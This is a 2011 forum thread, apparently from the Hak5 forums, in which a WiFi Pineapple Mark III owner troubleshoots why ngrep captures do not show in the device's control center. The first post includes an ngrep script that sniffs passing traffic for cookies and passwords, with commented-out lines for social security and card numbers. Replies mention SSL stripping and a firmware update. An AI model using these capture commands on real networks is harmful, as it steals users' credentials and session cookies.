Marlboro Filter Posted December 9, 2011 Share Posted December 9, 2011 please help me for some of the cases that occurred for my MK3: The first case, ngrep. I've enabled cookies and passwords feature but results from ngrep.log not appear in the pineapple ControlCenter I want to know how to bring it in pineapple control center. but when I check via ssh to 172.16.42.1 cookie file exists in temporary folder (ngrep.log). is there a solution to display results to the control center ? (attach file) cookie info pineapple control center my ngrep config #!/bin/sh # Capture Cookies ngrep -q -d eth0 -W byline -i 'Cookie:' dst host not 172.16.42.1 >> /tmp/ngrep.log ##ngrep -q -d eth0 -Wbyline -O /tmp/ngrep.pcap -i 'cookie:' tcp and port 80 and dst host not 172.16.42.1 >> /tmp/ngrep.log # Capture Social Security Numbers ##ngrep -q -d eth0 -W single -w '[0-9]{3}\-[0-9]{2}\-[0-9]{4}' dst host not 172.16.42.1 >> /tmp/ngrep.log # Capture Credit Card Numbers # #ngrep -q -d eth0 -W single '[0-9]{4}\-[0-9]{4}\-[0-9]{4}\-[0-9]{4}' dst host not 172.16.42.1 >> /tmp/ngrep.log # Capture Passwords ngrep -q -d eth0 -W single -i 'password' dst host not 172.16.42.1 >> /tmp/ngrep.log second case, karma.log when I turn on my mark III for about 15 minutes and I saw that in the file / tmp karma.log increase in size very quickly. if i can use or activate logrotate karma.log crontab to remove them? (attach file) using disk partition increse please help me :( :( :( Thanks Quote Link to comment Share on other sites More sharing options...
itsm0ld Posted December 10, 2011 Share Posted December 10, 2011 I actually thought I had a problem with the association log when I first got the MK3 using firefox. I found that if I use chrome I don't have any problems in the interface however I still cant see some of the fields when I use Firefox, not sure why but I would try switching browsers first, its not hard and easy to check. Quote Link to comment Share on other sites More sharing options...
Marlboro Filter Posted December 10, 2011 Author Share Posted December 10, 2011 Thank you for the reply itsm0ld, but still no luck, i already tried using chrome still no cookies shown at pineapple control center. chrome ngrep conf my pineapple control center Quote Link to comment Share on other sites More sharing options...
Marlboro Filter Posted December 10, 2011 Author Share Posted December 10, 2011 (edited) when i tried to stop ngrep via pineapple controlcenter it gives me a blank page is there any problems with the script ? when i stop these MK3 Karma : normal URL Snarf : normal DNS Spoof : normal Edited December 10, 2011 by Marlboro Filter Quote Link to comment Share on other sites More sharing options...
allisonmagic Posted December 10, 2011 Share Posted December 10, 2011 (edited) Thank you for the reply itsm0ld, but still no luck, i already tried using chrome still no cookies shown at pineapple control center. chrome ngrep conf my pineapple control center i noticed your trying to capture passwords.. where are you trying to capture from ? if the site is SSL secured, you need to ip/port forward and make sure you have SSL strip running Edited December 10, 2011 by allisonmagic Quote Link to comment Share on other sites More sharing options...
Marlboro Filter Posted December 10, 2011 Author Share Posted December 10, 2011 yes, i already strip the ssl :) (with itsm0ld script running at BT5R1) http://forums.hak5.org/index.php?showtopic=24228&st=20 even a normal site cookies wont show at PCC (Pineapple Control Center) :( :( ( but at the ngrep.log i can see the cookies data... Quote Link to comment Share on other sites More sharing options...
diggler Posted December 10, 2011 Share Posted December 10, 2011 I'm not coder, but maybe you have to uncomment both lines? -Wbyline (perhaps that stands for webinterface byline?) ngrep conf my pineapple control center Quote Link to comment Share on other sites More sharing options...
Marlboro Filter Posted December 11, 2011 Author Share Posted December 11, 2011 just tried uncomment both line at ngrep.sh but still nothing shows up :( :( at pcc Quote Link to comment Share on other sites More sharing options...
p0mad Posted December 12, 2011 Share Posted December 12, 2011 (edited) Self-Removed Edited January 25, 2012 by p0mad Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 12, 2011 Share Posted December 12, 2011 Make sure to keep up to date with the newest firmware. Quote Link to comment Share on other sites More sharing options...
p0mad Posted December 12, 2011 Share Posted December 12, 2011 (edited) Self-Removed Edited January 25, 2012 by p0mad Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted December 12, 2011 Share Posted December 12, 2011 Maybe update to my newest flash-able firmware (1.9) Quote Link to comment Share on other sites More sharing options...
p0mad Posted December 12, 2011 Share Posted December 12, 2011 (edited) Self-Removed Edited January 25, 2012 by p0mad Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted December 12, 2011 Share Posted December 12, 2011 Issue solved for me ... ngrep working fine now with 1.9 Thx :) ;) Glad it helped! Quote Link to comment Share on other sites More sharing options...
Marlboro Filter Posted December 13, 2011 Author Share Posted December 13, 2011 hi there, thank you for the solution but before i'm flashing to 1.9 i want to ask few things: 1. what's differents beetween 1.0.2 and 1.9 ? 2. is it OK to flash the unit to 1.9 that i bought from hak5 ? 3. if i want to flash it to 1.9 via gui i must start from here right ? sorry for my noobs questions :) Quote Link to comment Share on other sites More sharing options...
diggler Posted December 13, 2011 Share Posted December 13, 2011 1. http://wifipineapple.com/doku.php <-- read changelog here 2. yes 3. yes hi there, thank you for the solution but before i'm flashing to 1.9 i want to ask few things: 1. what's differents beetween 1.0.2 and 1.9 ? 2. is it OK to flash the unit to 1.9 that i bought from hak5 ? 3. if i want to flash it to 1.9 via gui i must start from here right ? sorry for my noobs questions :) Quote Link to comment Share on other sites More sharing options...
Marlboro Filter Posted December 13, 2011 Author Share Posted December 13, 2011 woww.. Thank you very much diggler for fast response.... for number 1. i meant, why there 2 version available 1.0.2 and 1.9 ? now i'm confident to flash the router... :) :) :) :) thanks Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 13, 2011 Share Posted December 13, 2011 woww.. Thank you very much diggler for fast response.... for number 1. i meant, why there 2 version available 1.0.2 and 1.9 ? now i'm confident to flash the router... :) :) :) :) thanks 1.0.2 is the source version. The 1.9 is the compiled firmware which is easy to flash and updated by Sebkinne with fixes and features. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.